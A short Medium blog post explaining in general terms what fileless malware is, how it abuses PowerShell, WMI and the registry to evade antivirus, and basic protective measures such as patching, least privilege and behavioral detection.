Open in app

Sign in

Write

Sign in

What is Fileless Malware

Tech-Simplified
2 min readMay 5, 2018

Fileless malware goes by many names, including ‘non-malware’, ‘memory-based malware’ and ‘living off the land attacks’

Fileless Malware is not like traditional malware that install files on a computer to perform its task but it is like command based malware that hijack built-in tools of windows like PowerShell and WMI (Windows Management Instrumentation)

This makes it difficult for traditional antivirus programs to detect the malware since PowerShell and WMI are legitimate programs, any command they execute is assumed to also be legitimate.

How does it work - example

Where does it reside

  1. RAM - some fileless malware reside here without placing themselves in hard drive, this type is uncommon as the RAM clears as soon as the system is restarted
  2. Registry - Registry is a database of low level settings that windows and softwares use some fileless malware store themselves here in undetectable way

What makes it so powerful and dangerous

  1. Fileless Malware is not detectable by traditional Antivirus
  2. Fileless malware use PowerShell which is a powerful scripting language that has access to machines inner cores and windows API also it can be used to execute commands remotely with high privileges.
  3. Fileless malware use WMI which allows Administrators to install software, change user privileges, allocate resources this is mostly used by IT Administrators, hence this is a very powerful tool misused by malware

How to protect yourself from Fileless Malware

  1. Keep your operating system and softwares upto date ~ Fileless malware finds vulnerabilities in old softwares and exploit it
  2. Disable PowerShell if not required
  3. Use Antivirus with behavioral detection ~Antivirus may not detect Fileless malware using file properties, it should be able to detect unusual or suspicious activities
  4. Follow the principle of least privilege ~ do not give excess privileges to user who may not require it, as more the privileges more the chances of Malware to work at elevated authority, this is why IT firms don’t give Admin privileges to employees easily

Sources & Artwork

www.bleepingcomputer.com

www.eset.com

www.cybereason.com

blog.emsisoft.com

Sign up to discover human stories that deepen your understanding of the world.

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Microsoft
Malware
Exploit
Virus
DNS

--

--

Tech-Simplified
Tech-Simplified

Written by Tech-Simplified

21 Followers
19 Following

Saket Sharma | Tech | Games | Photography | Cybersecurity | Hacking | & Stuff 😉

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams